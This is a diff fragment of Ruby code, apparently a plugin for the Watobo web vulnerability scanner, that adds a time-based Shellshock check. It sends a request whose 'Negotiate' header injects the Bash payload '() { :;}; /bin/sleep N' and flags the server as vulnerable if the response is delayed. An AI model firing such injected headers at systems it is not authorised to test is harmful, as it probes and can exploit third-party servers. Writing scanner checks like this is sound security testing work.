+                         stop = Time.now().to_i
+                         rtimes << ( stop - start )
+                      
+                    end
+                      # now calculate the average time
+                      t_average = rtimes.inject(:+) / rtimes.length
+                      t_average = 1 if t_average == 0
+                      
+                      time_to_sleep = rtimes.max > (2 * t_average) ? rtimes.max : (2 * t_average)
+                      
+                      timeout_counter = 0
+                     t_start = Time.now().to_i
+                   
+                   request = chat.copyRequest
+                   request.addHeader("Negotiate", "() { :;}; /bin/sleep #{time_to_sleep}")
+                   
+                   test_request, test_response = doRequest(request, :default => true)
+                   
+                   t_stop = Time.now.to_i
+                   timeout_counter += 1
+                         
+                   duration = t_stop - t_start
+                   #  puts duration
+                   if ( duration >= time_to_sleep )
+                           puts "Found ShellShock Vulnerablitiy !!!"
+                           puts "after #{duration}s / time-to-sleep #{time_to_sleep}s)"
+                          
+                           test_request.extend Watobo::Mixin::Parser::Url unless test_request.respond_to? :path
+                          
+                           path = "/" + test_request.path
+                          
+                           output << "SleepTime: #{time_to_sleep}\nQuery Duration: #{duration}s" 
+                                                   
+                           addFinding( test_request, test_response,
+                                     :check_pattern => "Negotiate.*sleep \d",
+                                     :chat => chat,
+                                     :title => "[Timing] - #{path}",
+                                     :proof_pattern => "",
+                                     :test_item => "Negotiate",
+                                     :class => "ShellShock (Time-based)",
+                                     :output => output               
+                                     )
+                            #readlines
+                          break 
+                         end
+                        
+                     
+                    [ test_request, test_response ]
+                  }
+                  yield checker
+                  
+                
+             end
+          end
+
+        # --> eo namespace    
+      end
+    end
+  end
+end